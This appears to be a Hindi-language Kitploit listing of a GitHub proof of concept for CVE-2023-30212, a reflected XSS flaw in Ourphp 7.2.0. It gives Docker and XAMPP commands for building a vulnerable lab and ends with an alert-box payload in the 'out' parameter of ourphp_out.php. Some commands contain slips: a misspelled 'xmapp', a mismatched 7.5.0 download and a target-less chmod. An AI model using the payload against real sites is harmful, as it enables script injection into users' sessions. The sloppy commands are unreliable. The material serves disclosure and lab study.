CVE-2023-30212-POC — CVE-2023-30212 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, Ourphp 7.2.0 में एक XSS भेद्यता, Docker सेटअप और पेलोड प्रदर्शन सहित। | Kitploit
उपकरण / GitHub / arunsnap / cve-2023-30212-poc
arunsnap/cve-2023-30212-poc CVE-2023-30212-POC CVE-2023-30212 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, Ourphp 7.2.0 में एक XSS भेद्यता, Docker सेटअप और पेलोड प्रदर्शन सहित।
1 1 3 साल पहलेहमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।
पिछले 7 दिन पिछले 30 दिन
CVE-2023-30212-POC
एक असुरक्षित Docker वातावरण बनाना और Ourphp संस्करण 7.2.0 में कमजोरी का शोषण ( CVE 2023 30212 )
चरण 1. अपने सिस्टम में Docker डाउनलोड और इंस्टॉल करें। मैं Docker का उपयोग कर रहा हूँ क्योंकि यह ubuntu इंस्टॉल करने में तेज़ और आसान है
चरण 2. Docker वातावरण सेट करें
sudo apt-get install docker.io
docker pull ubuntu
docker run -d -t --name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
docker exec -it test-container bash
चरण 3. निर्भरताएँ इंस्टॉल करना
apt-get update
apt-get install wget
apt-get install nano
apt-get install unzip
apt-get install net-tools
apt-get install locate
चरण 4. वेब सर्वर, php और mysql इंस्टॉल करें। इसके लिए मैं xampp सर्वर इंस्टॉल करूँगा। wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
cd /opt/lampp
./xmapp start
चरण 5. Ourphp संस्करण 7.2.0 डाउनलोड करें wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
cp ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 777
चरण 6. ब्राउज़र पर Ourphp सेट करें अपना ब्राउज़र खोलें और localhost या 127.0.0.1 दर्ज करें निर्देशों का पालन करें और Ourphp इंस्टॉल करें
चरण 7. कमजोरी का शोषण Ourphp 7.2.0 संस्करण में XSS (क्रॉस-साइट स्क्रिप्टिंग) की कमजोरी है। /client/manage/ourphp_out.php फ़ाइल में कमजोरी को कम करने के लिए जो XSS कोड के निष्पादन की अनुमति देती है
आपको कोड को संशोधित करने की आवश्यकता है। कमजोरी तब उत्पन्न होती है जब "ourphp_admin" पैरामीटर "logout" पर सेट होता है, और नियंत्रणीय चर "out" है
अवधारणा का प्रमाण payload - "</script><script>alert('xss')</script>".
parameter - http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>
वीडियो